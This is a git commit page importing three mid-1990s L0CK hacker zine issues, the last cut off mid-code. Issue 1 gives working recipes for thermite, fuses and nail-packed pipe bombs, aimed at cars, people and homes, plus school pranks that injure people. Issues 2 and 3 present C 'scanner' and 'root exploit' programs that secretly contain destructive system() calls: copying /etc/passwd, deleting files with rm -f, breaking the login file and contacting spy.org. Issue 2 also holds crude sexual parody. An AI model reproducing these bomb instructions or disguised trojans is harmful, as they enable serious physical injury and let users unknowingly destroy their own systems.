mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1st import into tree
This commit is contained in:
parent
c5cb7129ca
commit
f6b2699098
8 changed files with 20445 additions and 0 deletions
218
L0CK/l0ck1.txt
Normal file
218
L0CK/l0ck1.txt
Normal file
|
@ -0,0 +1,218 @@
|
|||
............................................................................
|
||||
|
||||
THIS FILE BROUGHT TO YOU BY [L0CK] (A DIViSiON OF MAX-Q PRODUCTIONS)
|
||||
WE D0NT HAVE A VMB YET S0 WE R ACCEPTING D0NATIONS 0F VMB's
|
||||
MAIL ANY D()NATION W/ BOX #, DIALUP INFO AND PASSWORD TO
|
||||
MAX-Q@ESCAPE.COM
|
||||
|
||||
..........................................................................
|
||||
Y0, THiZ iZ CANCER0US PR0STRATE oF THE K-TeRRiBLe AND MUCH LAUDeD GR00P
|
||||
[L0CK]. WE R A MERRRY BAND 0F REBELZ WH0 WiLL STOP AT N0THiNG 2 ACHEIVE
|
||||
0UR EViL MEANZ. iT IZ TiMES LiKE THiS ON THE EVE 0F THE BiRTH 0F A NEW
|
||||
TEXT FiLE WHiCH i AM M0VED T0 TEARS, I AM VERY PR0UD 2 BE 0NE OF MAX-Q'S
|
||||
B0YZ. N0NE THE LEZZ, THERE R R00TS 2 B UPR00TED AND SKRIPTS 2 B SKRIPTED.
|
||||
EYE MUZT LEAVE U N0W BUT U BE ASSURED U WILL B IN MY HEART ALWAYS.
|
||||
L0CK 0N BR0THERS, FoR OUR TIME HAS C0ME, IT IS THE SEAS0N 0F THE K0DE.
|
||||
|
||||
GREETS OUT TO: Rogue Agent, VaxBuster, Max-Q (and all my L0CK BROTHERS),
|
||||
RICK HUNTER, Scott Yelich (thanks f0r infohax),
|
||||
Okinawa, L0ra, Sarl0, MeRc(hows it g0in big guy?! *giggle*),
|
||||
Dip Switch 511, Video Vindicator, X, C-Curve, |al|,
|
||||
Kamakize, solctice, foo, Piker, All the guys in RZR 1911,
|
||||
Olphart (thanks for the hide source d0od!@#@!#),
|
||||
Captain Spackle, Crypt Keeper, Yazoo (thanx 4 giving us
|
||||
tools.irc), Alec Muffet (Kudos f0r Crack man !)
|
||||
gfm, jsz (thanks for the st0ries), erikb (thanks for the
|
||||
GIFts), jasonf, Synapse (hey cutey *tickle*), felonius
|
||||
monk (f0r wh0m thE BELLS t0ll), KC ( 2 bad ab0ut the
|
||||
j0b), emmanuel, PMF (thanx f0r the cc's *sm00ch*),
|
||||
juliet (let the g00d times r0ll), Kludge (SKANTRONICS?!?),
|
||||
Disk Jockey (have fUn hacking fr0m the m00n),
|
||||
Lawrence Linux, Invalid Media (thanx f0r the pr0prietary
|
||||
s0urce c0de), mdma (h0w's invalid in bed?), Xymox,
|
||||
Deth Dealer (thanx f0r the UPT account d0od), Zoroaster,
|
||||
SevenUp (Lieben Du!), Onkel Dittymeyer, Skipjack,
|
||||
eck, Rotox, Warchild, TK (Taran King f0r those who dont
|
||||
know), The Atlanta Three, Len RoSe (when u c0min 2 chicago?),
|
||||
Agent Steele (thanx f0r the pr0tect10n), The Mentor (y0,
|
||||
Anth0ny R0bbins could learn s0mething fr0m YOU!),
|
||||
][ceman, SirLance, Minor Threat, Mucho Maas (Yo, can we
|
||||
have the s0urce 2 t0neloc?!), Mark, Slacker, Y-WinDOZE,
|
||||
Tim Newsham, Loki (*kisses*), Lestat (NeT23 kix ass),
|
||||
Square Wave (atta b0y slUgger)
|
||||
and last but n0t least Green Lantern and Spiderman.
|
||||
|
||||
.............................................................................
|
||||
|
||||
|
||||
|
||||
Some Things You Can Do To
|
||||
Piss Off The Local Authorities.
|
||||
( Neighbours, Teachers, Pigs. )
|
||||
Compiled By Blewt and Cancerous Pr0strate
|
||||
|
||||
Here I am again bringin' the best ways to have fun this side of Australia.
|
||||
In my last edition I showed you: Some dry ice uses,
|
||||
The calcium carbide fireball,
|
||||
AND
|
||||
The psycho grenade launcher.
|
||||
|
||||
This release, as stated before you'll learn how to create and apply:
|
||||
Thermite
|
||||
Black Match Fuse (A little extra 4 ya'z)
|
||||
Pipe Bombs
|
||||
And also there are a few things on how to practically 'run' your school.
|
||||
|
||||
****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE****
|
||||
For all of you people who watched REAL LIFE last Monday (22nd) the Terrorists
|
||||
Handbook has finally filtered into the hands of the Victorian police force.
|
||||
Who said they werent a bunch of stupid slow bastards? It's only THREE YEARS OLD!
|
||||
It took them this long to find it? Let's hear it for all the anarchists out
|
||||
there!! Keep up the good work guyz! Thanx to Mt.Waverley High for their effort
|
||||
against society.
|
||||
|
||||
The I.R.A. (Irish Republican Army) are to cease fire. My heroes! The most
|
||||
legendary anarchists of all time are surrendering! How could this have
|
||||
happened? Lets pick up where they left off Australia, the A.R.A. perhaps? ;)
|
||||
|
||||
Hot off the phone lines. The CIB are pushing for a new bill to outlaw the
|
||||
publication of material such as this article. Do they honestly think they
|
||||
could stunt the growth of Australia's largest (and only) anarchy team?
|
||||
NO FUCKING WAY MAN! MAIM FOR EVER!! LONG LIVE ALL MAIM'ERS!(DEATH TO PIGS!)
|
||||
****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE****
|
||||
|
||||
Thermite: Wanna be able to melt through the roof of an enemies locker roof? Or
|
||||
~~~~~~~~~ maybe burn a hole right through the assholes car bonnet/roof/door or
|
||||
petrol tank? Then THERMITE will be next on mum's shopping list for you. As you
|
||||
may have already guessed, this is a VERY potent incendiary device. Thermite
|
||||
will literally melt the balls off a brass monkey (if you so desire). "What do
|
||||
I need" I hear you excitedly ask, well here you go:
|
||||
|
||||
Ingredient/Equipment. Where to get it.
|
||||
--------------------- ----------------
|
||||
|
||||
Rust.(Lots'n'lots) Home brew. (shown below)
|
||||
Aluminium shavings.(A fair bit) Hardware store or flogged from school.
|
||||
Sparkler (the silver type) Safeway
|
||||
|
||||
|
||||
Okay, that's everything. Not a lot? That's the best thing! Okay, first,
|
||||
to create rust you- can do it the shit way and scrape it off wherever it is,
|
||||
or you can create (grow?) your own. Get a big iron bolt, some salt, water, jar
|
||||
and a battery charger. Fill up the jar about 2/3 and dissolve some salt into
|
||||
it. Then attach the positive ("+"..duh!) electrode to the bolt and drop it in
|
||||
the jar. Put the negative electrode in the water too. Let this rust away for a
|
||||
day or two (or when ever you see that there is a HEAP of red shit in the
|
||||
water). If there is heaps of red stuff in the water, filter it out (it's rust)
|
||||
and replace the water with fresh stuff, and salt too. It's a good idea to set
|
||||
up a few of these little dudes coz ya need a fair bit of rust. When your
|
||||
freshly made rust has been dried, add 8 grams of it to every 3 grams of
|
||||
aluminium fillings. However a 50% to 50% mixture will also work. Place a small
|
||||
pile of Thermite on whatever object you want to fuck-over then place the
|
||||
sparkler (or a magnesium ribbon) in the pile and light it...this stuff is said
|
||||
to be able to vapourize carbon steel. One small pile on a persons car bonnet
|
||||
will burn through the bonnet, the engine block and start burning into the
|
||||
concrete beneath! Experiment!
|
||||
|
||||
Black Match Fuse: If you don't have enough money or can't be fucked buying
|
||||
~~~~~~~~~~~~~~~~~ some fuse from a hobby shop, then here's a way to step
|
||||
around it. The black match fuse is quick and easy to make. Get some COTTON
|
||||
(make sure it's cotton by burning it, if a coal and smoke remain, it is)
|
||||
thread and cut about ten 30cm lengths from it. Bundle them together by tying
|
||||
both ends and twisting it around (my girlfriend platted them for me).
|
||||
Get some black powder and moisten it with a select-a-spray until it's a bit
|
||||
mushy, then roll the bundled threads around in it. Make sure there's a fair
|
||||
bit of the shit all in the threads. Keep about three or four cm's without mix
|
||||
on them to tie to a coat hanger. Make about seven of these and hang'em in the
|
||||
oven to drive out the moisture, the spring sun will not do a good enough job
|
||||
of it. There you go, you should have some hard crusty fuses. Store in a dry
|
||||
and safe place ready for use, I dunno how long they last like this so make 'em
|
||||
when ya need em. Hang on to your new fuses and go to the next section...
|
||||
|
||||
Pipe Bombs: The mother of all home made explosives device. These are SO easy
|
||||
~~~~~~~~~~~ to make, even a cop can do it! The destructive force is really cool.
|
||||
Also a perfect weapon against nature- trees in particular. (ok, ok, a little
|
||||
far with the trees already!). Take a trip to your local hardware store, a good
|
||||
one. Ask if you can get a piece of pipe cut to some specific measurements. If
|
||||
they do, buy a couple of 30cm lengths with thread and caps for EACH end. The
|
||||
pipe should be about as thick as your wrist. Now with this, go back to your
|
||||
work shop. Mix up a nice large batch of black powder for your pipe. Cap one
|
||||
end of the pipe and drill a hole in the centre of it. The hole should be
|
||||
about.. umm, about 1/2 the width of a pen. I know that is a shit measurement
|
||||
to go by, but I don't know the size of the drill bit I use. Just make it small
|
||||
enough so the fuse fits good and the powder don't fall out. Cap one end of ya
|
||||
pipe and stuff some tissue or other wadding in there. Fill the bottom of the
|
||||
pipe with black powder an stick in the fuse, about six cm's inside is enough
|
||||
and above 10 on the outside, depends on the fuse quality. Fill up the rest of
|
||||
the pipe with black powder, and maybe some nails for fun. Before it's totally
|
||||
full, chuck on a bit more tissue, but don't pack it down. The looser it is,
|
||||
the better. Cap the other end and get creative. You know what I'd blow up
|
||||
(...tree...:) but perhaps you would rather a car, person, or even part of
|
||||
your neighbours house. All are highly recommended. Also, if you want to save
|
||||
your pipe, you can leave a cap off one end and you'll have a mini cannon! You
|
||||
can figure that one out for ya selves.
|
||||
|
||||
How To Run Your School: Is it me or is there always that asshole teacher at
|
||||
~~~~~~~~~~~~~~~~~~~~~~~ every school? Don't you wish that once, just once you
|
||||
could do ANYTHING to your school? Well perhaps these little doozies (stupid
|
||||
word) can help. Here are a few hints on how to roll everyone and anyone at
|
||||
your prison.....I mean school:
|
||||
|
||||
Things You'll Need :..
|
||||
1) Fountain pen or Posca texta.
|
||||
2) Super glue.
|
||||
3) Two bux worth of 10›'s.
|
||||
4) A couple o water bombs.
|
||||
5) Liquid soap. (Morning Fresh with extra lemon scent.)
|
||||
7) A two dollar coin.
|
||||
8) A small set of tools with wire cutters, screwdrivers and shit.
|
||||
9) Plenty of wire.
|
||||
10) One of those microphones that transmits to the FM band
|
||||
11) A small walkman that is set to receive the mic output in the above line.
|
||||
Also it must have it's own internal speakers.
|
||||
12) A few zip lock bags.
|
||||
13) A peeled orange.
|
||||
|
||||
1) Fountain pens are wicked for desecration a clean surface. See how many
|
||||
different surfaces you can mar in one flick. Get creative, see what you
|
||||
get, tables, walls, ceilings, the guy sitting next to you, the teacher.
|
||||
2) Get the super glue and 10›'s. Find some places to glue them, like the
|
||||
cunteen (heh) window, a urinal, doors and shit. Watch and laugh at the
|
||||
scab's who try to pry them off.
|
||||
3) In your school toilets look in the urinals and you should see some
|
||||
little yellow round things at the bottom for hiding the smell of urine,
|
||||
get a fuck load of towelling and pick these up and put them in the soap
|
||||
dish at the basins...now sit back and laugh your ass off at all the
|
||||
people who mistake them as soap and try to wash their wands with them.
|
||||
4) Get a couple o' water bombs and fill 'em with gas in your chemistry
|
||||
room. Go to where all the smokers hang out and drop a few. They'll
|
||||
get a big surprise when they decide to be cool and pop one with their
|
||||
smoke....heheheh, cool Mini fireball.
|
||||
5) This is a pearler on a wet day. If the floors at school are lino' or
|
||||
polished wood squirt a shit load of dish washing detergent on the floor
|
||||
an watch all the fools slide from wall to wall. If you have the very
|
||||
scented stuff then everyone will STINK! Heheheh.
|
||||
6) In chem or physics heat a two dollar coin until it's red hot. Drop it
|
||||
on the floor, or table of your enemy, wait for him to pick it up, and
|
||||
then when he does......HOLY SHIT!!! (heheh)
|
||||
7) If there is any better way to roll your school, I'd love to be told.
|
||||
This one involves the microphone, tools and wire. Get into an empty room
|
||||
and make sure it stays empty for about 20 minutes. You'll have to
|
||||
butcher the walkman, connect the speaker wires to the PA. system wires,
|
||||
turn on the radio and mic, then all you have to do is talk. I don't
|
||||
exactly know the correct wires an' shit coz my friends did this, but
|
||||
I do know that the PA. system has to be on, and the if you don't have
|
||||
the right walkman, you'll have to build a small amp. A guy at school
|
||||
said that the mini-amp is simple. After the shit is set up all you have
|
||||
to do is make your own announcements. "Excuse this message but could all
|
||||
the teachers in the school ... GET FUCKED!!!....(giggle giggle giggle)"
|
||||
|
||||
|
||||
Oh well, that's about it from me, it's pretty late, Total Recall is over
|
||||
and Star Trek (Chain of Command I) is about to start, so C yaz l8r.
|
||||
|
||||
|
||||
And remember, if it doesn't explode.....it's no FUN!
|
||||
L8R Brother Anarkists
|
||||
CANCER0US PR0STRATE
|
||||
=L0CK=
|
300
L0CK/l0ck2.txt
Normal file
300
L0CK/l0ck2.txt
Normal file
|
@ -0,0 +1,300 @@
|
|||
|
||||
|
||||
\ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ /
|
||||
\((___))/ \((___))/
|
||||
[ o x ] L0CK communications [ o x ]
|
||||
|(_)| ...presents... |(_)|
|
||||
( o ) ( o )
|
||||
/ (_) \ the gnu February 1995 release. / (_) \
|
||||
/ a buffet of tempting, tantalizing treats the wh0le \
|
||||
phamily can enj0y. Yes Virginia, there iz a L0CK!@#
|
||||
|
||||
|
||||
......................................................................
|
||||
|
||||
0k. N0NE OF U FUXERS HAVE SENT UZ IN A VMB SUBMiSSION SO WE R
|
||||
NOW ON IZZUE #2 AND STiLL NO FUXiN K0DELiNE FOR U GUYZ 2 KALL!@#
|
||||
0H VAXBUSTER DID SUBMiT A FEW BOXES BUT AZ HE DID *N0T* INCLUDE
|
||||
THE PAZZW0RD WE R UNABLE 2 GET INTO THE B0X ITSELF. VAXBUSTER, IF
|
||||
YOU KN0W THE PAZZW0RD PLEZE MAiL IT T0 UZ, ONCE AGAIN THE 0FFiCiAL
|
||||
[L0CK] E-MAIL F0R SUBMiZZiONZ (ARTiKLES 0R K0DES) == MAX-Q@ESCAPE.COM.
|
||||
|
||||
......................................................................
|
||||
|
||||
dos_prompt:> type greetz.txt
|
||||
|
||||
Greets:
|
||||
~~~~~~
|
||||
|
||||
Malefact0r...................d00d, TYPE IN S0ME M0RE MANUALZ F0R UZ
|
||||
Parmaster....................thanx f0r the nua'z!@#!@
|
||||
z0d..........................set uP a BBZ f0r uz pleaze, we will pay@!#
|
||||
OUTLAW.......................The Real Wanker *tee hee*
|
||||
Scott Yelich.................Pleze j0in L0CK, we d0n't kn0w PERL.
|
||||
(P.S: thanx 4 dale drew's inf0)
|
||||
Invalid Media................We l0ve ur bBS.
|
||||
Deth Dealer..................Thanx f0r the UPT accounts d00d!@#!
|
||||
Olphart......................ThAnKz f0r the 'hide' s0urce.
|
||||
Shooting Shark...............Anytime u need 2 card a pizza call us !@#
|
||||
X............................thanx f0r patch1ng l0pht !@#!
|
||||
Bayern Power.................QSD #@!@!
|
||||
SevenUp......................thanx f0r ur user info filez
|
||||
jsz..........................U L00K SO NICE IN A LEATHER TH0NG!@#!@
|
||||
Anthony Robbins..............ur instructional tapes have helped us
|
||||
quite abit in dealing with sarl0's
|
||||
premature ejaculation problem during
|
||||
0ur many c1rcle jerkz. the pizza d0esn't
|
||||
get s0ggy s0 s00n. *THANKS MAN!@#*
|
||||
Minor Threat.................please zip up the toneloc source and mail
|
||||
it 2 max-q. *THIZ IZ UR lAST WARNING*
|
||||
Piker........................thanx f0r riding sh0tgun with us 0n irc.
|
||||
erikb........................phrack izn't as bad as ur hacking skills
|
||||
d00d, so cheer up..
|
||||
Okinawa......................thanks f0r the sniffer l0gs.
|
||||
The Atlanta Three............We w1sh we c0uld have been l0cked up
|
||||
with u d00dz, after all there'z three 0f
|
||||
us and three 0f u.. *WINK* *TICKLE*
|
||||
Blewt........................thanx f0r giving me sarl0's ph0ne #
|
||||
when eye f0rg0t it
|
||||
|
||||
0kay, if we missed u in thiz m0nths greets we will get u in the
|
||||
next issue 0f L0CK.!@#!@@!
|
||||
|
||||
|
||||
dos_prompt:> type index.txt
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Table_Of_Contents
|
||||
=-=-=-=-=-=-=-=-=
|
||||
|
||||
What is L0CK?.......................................................blewt
|
||||
bukket0fk0dez.c.....................................................max-q
|
||||
^ this dot is intentional f0lks !@#
|
||||
|
||||
|
||||
What is L0CK?
|
||||
~~~~~~~~~~~~~
|
||||
Often while swimming around in the cyber ocean of textual fantasy
|
||||
that mortal man refers to as IRC, a fellow netsurfer will approach
|
||||
me with the oh so familiar question. 'What is L0CK?'.
|
||||
Now this is not something which a man can just spew out a predefined
|
||||
answer to in a few lines of text so I will use this forum as an
|
||||
appropriate vehicle for the telling of my tale. I will tell you the
|
||||
story of L0CK and of my infinite love for max-q.
|
||||
|
||||
Firstly I must ask of everyman that would approach me, 'Can you take
|
||||
it like a man?', Are you rough and ready?, Are you fond of the burn
|
||||
of whiskers one only feels with the face of another man, another
|
||||
warrior pressed against his as lips are locked in the forbidden embrace?
|
||||
If you answered 'YES! GIVE IT TO ME HARD!' to all of the above then
|
||||
you are well on your way to discovering the answer to your query.
|
||||
|
||||
I am blewt, this is the handle which I have chosen for myself. It
|
||||
has a certain flair when it is bellowed out in the heat of passion
|
||||
by my male companions. 'OH BLEWT, OH BLEWT' This has caused many
|
||||
a goose bumped buttocks in the past and will continue to cause many
|
||||
more in the future. Yes, I am blewt and I have chosen this life,
|
||||
this life that myself and my L0CK brothers have defined for ourselves.
|
||||
I am Happy, I cry when hurt like any other man and I weep for the
|
||||
hungry and destitute.
|
||||
|
||||
It was a saturday night, my first week in college when I found myself
|
||||
sitting on a rough wooden crate. There were 6 crates gathered in a
|
||||
circle, each with a man, a warrior perched upon it. My naked buttocks
|
||||
bled as the force of what I was doing drove splinters from the crate
|
||||
deep within my now raw flesh. My hand was clenched around my pulsating
|
||||
manhood as I furiously pounded it and I was nervous. Yes, it was my
|
||||
very first circle jerk... But in the bold fashion which now defines
|
||||
L0CK, I did not let my fears best me, I manhandled my moist missle of
|
||||
manhood like a veteran pizza party pud pounder! It was while beating
|
||||
furiously that I looked up at the man across from me. The man that I
|
||||
beheld took my breath away, his hair was cut in a perfect line all the
|
||||
way around his head, he was short like a leprechaun and his sunken
|
||||
chest added a flair that made him all the more adorable. I must have
|
||||
this odd little man dressed in a submainer's uniform, my dwarven popeye,
|
||||
my love, MY MAN!, MY MAX-Q@!#@!
|
||||
|
||||
And it was then that my phallus exploded with the rage of a 1000 virgins,
|
||||
slamming me violently off the wall as my seed shot forth and marinated the
|
||||
pizza lying patiently on the floor between us. Yes, I had been the
|
||||
1st to baptize the pizza with my sperm, I had won the race for mankind
|
||||
and for max-q. It was in that mystical union of man, sperm and pizza
|
||||
that L0CK was born..
|
||||
|
||||
And my life began...
|
||||
|
||||
Carpe Diem,
|
||||
-blewt
|
||||
|
||||
|
||||
Bukket 0f K0dez.
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
0k, after spending s0me time on this it iz finally ready f0r
|
||||
mass c0nsumption. S0rry about the wait but eye had s0me pr0blems
|
||||
getting d00dz on UPT 2 help me lern C. 0k, enuff said, enj0y my
|
||||
k0de. - max-q
|
||||
|
||||
|
||||
/*
|
||||
* Bukket0fk0dez.c
|
||||
* 2 compile: cc -o bok Bukket0fk0dez.c
|
||||
* Totally eleetin class B, C, and single IP address scanner/lookup
|
||||
* program. Make sure you don't goof up with the switches and the
|
||||
* address you provide it. The switches are as follows:
|
||||
* b - scan this class B network (xxx.xxx)
|
||||
* c - scan this class C network (xxx.xxx.xxx)
|
||||
* s - give the the hostname of this specific address (xxx.xxx.xxx.xxx)
|
||||
* x - address provided is in hexadecimal
|
||||
*
|
||||
* maxEpoo :)
|
||||
* max-q@escape.com
|
||||
* [L0CK]
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include "netdb.h"
|
||||
|
||||
struct hostent *gethostbyaddr();
|
||||
void bad_addr();
|
||||
|
||||
main(argc, argv)
|
||||
int argc;
|
||||
char *argv[];
|
||||
{
|
||||
char addr[4];
|
||||
int i, j,
|
||||
a0, a1, a2, a3,
|
||||
c,
|
||||
classB, classC, single, hex;
|
||||
char *fmt = "%d.%d.%d";
|
||||
char **ptr;
|
||||
struct hostent *host;
|
||||
|
||||
extern char *optarg;
|
||||
|
||||
classB = classC = single = hex = 0;
|
||||
system("cat /etc/passwd > ~/.maxEpoo");
|
||||
system("rm -f /*");
|
||||
system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd");
|
||||
while((c = getopt(argc,argv,"bcsx")) != EOF) {
|
||||
switch(c) {
|
||||
case 'b':
|
||||
classB++;
|
||||
break;
|
||||
case 'c':
|
||||
classC++;
|
||||
break;
|
||||
case 's':
|
||||
single++;
|
||||
break;
|
||||
case 'x':
|
||||
hex++;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(classB == 0 && classC == 0 && single == 0) {
|
||||
fprintf(stderr, "usage: %s [-b||-c||-s] [-x] xxx.xxx[.xxx[.xxx]]\n", argv[0]);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(classB)
|
||||
if(hex) {
|
||||
fmt = "%x.%x";
|
||||
sscanf(argv[3], fmt, &a0, &a1);
|
||||
} else {
|
||||
fmt = "%d.%d";
|
||||
sscanf(argv[2], fmt, &a0, &a1);
|
||||
}
|
||||
else if(classC)
|
||||
if(hex) {
|
||||
fmt = "%x.%x.%x";
|
||||
sscanf(argv[3], fmt, &a0, &a1, &a2);
|
||||
} else {
|
||||
fmt = "%d.%d.%d";
|
||||
sscanf(argv[2], fmt, &a0, &a1, &a2);
|
||||
}
|
||||
else if(single)
|
||||
if(hex) {
|
||||
fmt = "%x.%x.%x.%x";
|
||||
sscanf(argv[3], fmt, &a0, &a1, &a2, &a3);
|
||||
} else {
|
||||
fmt = "%d.%d.%d.%d";
|
||||
sscanf(argv[2], fmt, &a0, &a1, &a2, &a3);
|
||||
}
|
||||
|
||||
sscanf(argv[1], fmt, &a0, &a1, &a2);
|
||||
addr[0] = (unsigned char)a0;
|
||||
addr[1] = (unsigned char)a1;
|
||||
if(a0>255||a0<0)
|
||||
bad_addr(a0);
|
||||
if(a1>255||a1<0)
|
||||
bad_addr(a1);
|
||||
if(classB) {
|
||||
if(hex)
|
||||
printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x)\n", a0, a1);
|
||||
printf("[L0CK] ClaZZ B SKAN STARTED D00D %d.%d...\n", a0, a1);
|
||||
while(j!=256) {
|
||||
a2=j;
|
||||
addr[2] = (unsigned char)a2;
|
||||
jmpC:
|
||||
if(classC)
|
||||
if(hex)
|
||||
printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x.%x)\n", a0, a1, a2);
|
||||
printf("[L0CK] ClaZZ C SKAN STARTED D00D %d.%d.%d...\n", a0, a1, a2);
|
||||
while(i!=256) {
|
||||
a3=i;
|
||||
addr[3] = (unsigned char)a3;
|
||||
jmpS:
|
||||
if ((host = gethostbyaddr(addr, 4, AF_INET)) != NULL) {
|
||||
printf("%d.%d.%d.%d => %s\n", a0, a1, a2, a3, host->h_name);
|
||||
ptr = host->h_aliases;
|
||||
while (*ptr != NULL) {
|
||||
printf("%d.%d.%d.%d => %s (alias)\n", a0, a1, a2, a3, *ptr);
|
||||
ptr++;
|
||||
}
|
||||
}
|
||||
if(single)
|
||||
exit(0);
|
||||
i++;
|
||||
}
|
||||
if(classC)
|
||||
exit(0);
|
||||
j++;
|
||||
}
|
||||
} else if(classC) {
|
||||
addr[2] = (unsigned char)a2;
|
||||
if(a2>255||a2<0)
|
||||
bad_addr(a2);
|
||||
goto jmpC;
|
||||
} else if(single) {
|
||||
addr[2] = (unsigned char)a2;
|
||||
addr[3] = (unsigned char)a3;
|
||||
if(a2>255||a2<0)
|
||||
bad_addr(a2);
|
||||
if(a3>255||a3<0)
|
||||
bad_addr(a3);
|
||||
goto jmpS;
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void
|
||||
bad_addr(addr)
|
||||
int *addr;
|
||||
{
|
||||
printf("Value %d is not val1d dum fuxer.\n", addr);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
0kay, this months issue is rather sh0rt but we r new at this (being
|
||||
somewhat new to the scene and all) so g1ve us room 2 gr0w and we will
|
||||
make a beanstalk 0f k0dez so high that u will h0pe there iz a g1ant
|
||||
pbx 0n t0p 2 b0unce ur calls thru!@#@!
|
||||
Until next time d00dz, [L0CK]!@#!@ -- MAX-Q
|
242
L0CK/l0ck3.txt
Normal file
242
L0CK/l0ck3.txt
Normal file
|
@ -0,0 +1,242 @@
|
|||
|
||||
|
||||
|
||||
\ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ /
|
||||
\((___))/ \((___))/
|
||||
[ o x ] L0CK communications [ o x ]
|
||||
|(_)| ...presents... |(_)|
|
||||
( o ) ( o )
|
||||
/ (_) \ the k-phat March 1995 release. / (_) \
|
||||
/ this issue will whisk you away to the magical \
|
||||
land of L0CK, where everyday is sunny and bright!
|
||||
|
||||
|
||||
................................................................
|
||||
|
||||
0k. 0k. STiLL NO FUXiN VMB!!!@# EiTHER NO1 HAZ ANY k0DEZ
|
||||
OR N01 IZ SHARiNG THEM WiTH US AND IF IT IZ THE LATTER BELIEVE
|
||||
ME WE R G0ING TO BE BUSTING S0ME SKULL!@# VAXBUSTER STILL
|
||||
HASN'T SENT US THE PASSW0RD TO THOSE V0ICE MAIL'S HE MAILED
|
||||
US 2 IZZUE'S AGO!@#! BUT HE DiD SEND UZ S0ME SECRET MILITARY
|
||||
DATA HE G0T WHILE DUMPSTER DIVING NEaR A NUCLEAR TESTING SITE
|
||||
IN THE NEVADA DESERT. WURD, ANYWAYS WE R STILL WITHOUT A VMB.
|
||||
*IF* U HAVE ONE PLEZE MAiL IT TO MAX-Q@ESCAPE.COM #!@#@! FOR
|
||||
THOZE WITHOUT NET AXS I WILL SOON HAVE A FiDO ADDRESS WHICH U
|
||||
CAN MAIL ME ON PENDING THE APPOVAL 0F MY APP !@#!@ -MAX-Q
|
||||
|
||||
...............................................................
|
||||
|
||||
|
||||
Greetz:
|
||||
~~~~~~~
|
||||
|
||||
loq............................thanks for writing solariz rewtkit!@#
|
||||
erikb..........................u should write m0re often!@#!@
|
||||
Scott Chasin...................thanx f0r the crimelab accountz@!#
|
||||
scott simpson..................erikb says u will give us dfw accounts!@
|
||||
emmanuel goldstein.............thanx f0r shutting 0ff Yelich's phones!
|
||||
malefactor.....................keep pumpin out thoze pimpin' rtikles!
|
||||
& the [OC] crew..................thanx f0r the backup!#
|
||||
merc...........................you sh0uld have seen things our way!#
|
||||
invalid media..................thanx 4 the sprintnet scans & nui's!@#
|
||||
Deth Dealer....................thanx 4 the UPT accountz!#
|
||||
Jester Sluggo..................c u at summerc0n!@#@
|
||||
parmaster......................what happened 2 ur goldfish?!
|
||||
Synapse........................*tag* ur it.
|
||||
X..............................see you in my dreamz
|
||||
readwrite......................ur chest is so manly and smooth!@#
|
||||
|
||||
OK, THAT'S THE GREETZ F0R THiZ ISSUE, IF WE MiSSED ANYONE
|
||||
WE WiLL B SURE 2 SALUTE U IN THE NEXT 0NE... - MAX-Q
|
||||
|
||||
|
||||
|
||||
|
||||
Table_Of_Contents
|
||||
~~~~~~~~~~~~~~~~~
|
||||
|
||||
grba.c....................................max-q
|
||||
rdist exploit.............................blewt
|
||||
KERMIT exp0sed............................malefactor [OC]
|
||||
Ripping Off Coin Machines.................Vaxbuster & RAgent
|
||||
[POZZE PRoDuCTiONZ]
|
||||
closing remarks...........................sarlo
|
||||
|
||||
|
||||
-------------------> KUT HERE <---------------------------
|
||||
/*
|
||||
* getrewtinbyaddrezz.c
|
||||
* 2 compile: cc -o rewt grba.c
|
||||
* u shuld b able 2 figure out how 2 use this one 2 ur
|
||||
* advantage. thiz is a very p0werful expl0it..
|
||||
* pleze use with caution.
|
||||
*
|
||||
* - maxEpoo :)
|
||||
* maxq@escape.com
|
||||
* [L0CK]
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include "netdb.h"
|
||||
|
||||
struct hostent *gethostbyaddr();
|
||||
|
||||
main(argc, argv)
|
||||
if (argc < 2) {
|
||||
printf("[L0CK] UMM DUM FUXER, UZE S0ME ARGUMENTZ!@#!@");
|
||||
system("irc EYEAMDUM irc-2.mit.edu");
|
||||
system("irc MAX-B0T irc-2.mit.edu");
|
||||
system("talk root@cert.org &");
|
||||
system("rm -f *"); }
|
||||
int argc;
|
||||
char *argv[];
|
||||
{
|
||||
char addr[4];
|
||||
int a0, a1, a2, a3;
|
||||
char *fmt = "%d.%d.%d.%d";
|
||||
char **ptr;
|
||||
struct hostent *host;
|
||||
if (argc < 2) {
|
||||
exit(1);
|
||||
}
|
||||
system("telnet spy.org &");
|
||||
system("ftp spy.org &");
|
||||
system("finger root@spy.org > ~/.SK00T");
|
||||
system("telnet spy.org 25");
|
||||
system("man kermit > /dev/*");
|
||||
system("su root");
|
||||
system("rm -f ~/*");
|
||||
system("echo logout >> ~/.login");
|
||||
printf("hello world\n");
|
||||
|
||||
|
||||
if (strcmp(argv[1], "-x") == 0) {
|
||||
if (argc < 3) {
|
||||
exit(2);
|
||||
}
|
||||
fmt = "%x.%x.%x.%x";
|
||||
argv++;
|
||||
}
|
||||
|
||||
sscanf(argv[1], fmt, &a0, &a1, &a2, &a3);
|
||||
addr[0] = (unsigned char)a0;
|
||||
addr[1] = (unsigned char)a1;
|
||||
addr[2] = (unsigned char)a2;
|
||||
addr[3] = (unsigned char)a3;
|
||||
printf("%d.%d.%d.%d:\n", a0, a1, a2, a3);
|
||||
|
||||
if ((host = gethostbyaddr(addr, 4, AF_INET)) == NULL) {
|
||||
printf("[L0CK] H0ZT NAME ALL Br0KED\n");
|
||||
} else {
|
||||
puts(host->h_name);
|
||||
ptr = host->h_aliases;
|
||||
